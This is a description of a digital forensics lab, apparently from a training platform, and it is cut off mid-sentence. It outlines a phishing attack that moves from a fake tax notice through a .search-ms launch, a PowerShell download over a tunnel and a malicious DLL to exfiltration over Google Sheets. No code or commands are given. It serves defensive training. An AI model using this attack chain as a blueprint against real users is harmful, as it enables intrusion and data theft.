This lab presents a comprehensive forensic investigation into a sophisticated phishing attack that escalates into a multi-stage malware infection. The attack begins with a deceptively crafted email impersonating a government tax authority, designed to exploit social engineering tactics and provoke user interaction. The malicious email, disguised as a tax update notice, lures the victim into clicking a fraudulent hyperlink, initiating a chain of compromise that spans phishing, tunneling, script execution, payload delivery, and covert data exfiltration.
As the investigation unfolds, you will examine artifacts from a disk to trace the attacker’s methodology. The phishing email leads to a malicious webpage hosted on a free domain via InfinityFreeApp, which uses the Windows Search Protocol to launch a .search-ms file. This action silently executes a PowerShell command that pulls and runs a Python script from a TryCloudflare tunnel. The script proceeds to retrieve a ZIP archive containing a malicious DLL file, which is then deployed in the system's user directories. From there, the malware establishes a command-and-control (C2) channel by leveraging the Google Sheets API, allowing it to exfiltrate sensitive data and receive remote instructions undetected.
You will utilize tools such as Splunk, ChromeCacheView, and VirusTotal to uncover key indicators of compromise, trace the attacker’s activity, and attribute the attack to a broader threat landscape. By c